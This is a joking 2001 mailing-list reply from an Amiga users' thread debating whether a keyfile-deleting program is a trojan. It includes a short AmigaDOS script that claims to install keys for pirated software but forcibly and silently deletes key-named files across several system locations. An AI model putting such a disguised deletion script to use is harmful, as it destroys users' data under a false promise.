From: | Alan Buxey |
Date: | 16 Aug 2001 at 17:26:20 |
Subject: | Re: new virus 'trojan' |
hi,
> This isn't a trojan. Trojans are malicious and harmful, deleting
> keyfiles from a wannabe pirate's hard drive is neither :)
well, the only part of 'trojan' i could work out was that it didnt do what
it said on the tin ;-)
> > PS its hardly inginuity, I could have written such a wonderful 'tool'
> > years ago.
>
> There's a command on the Workbench disks to do this too.
;-) heres my new piece of shareware...it'll make all your worries about
key management disappear
-----8<-----8<-----8<------cut here-----
.key s
echo "Installing keys for all your programs ever pirated!"
delete s:#?key#? all force quiet
if exists keys:
delete keys:#? all force quiet
endif
delete sys:#?key#? all force quiet
echo "all done! no need to reister anymore"
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anyone want to use this? if so, then please just send $10 to my address
and I'll send you a keyfile to enable it to make even MORE keys! ;-)
alan
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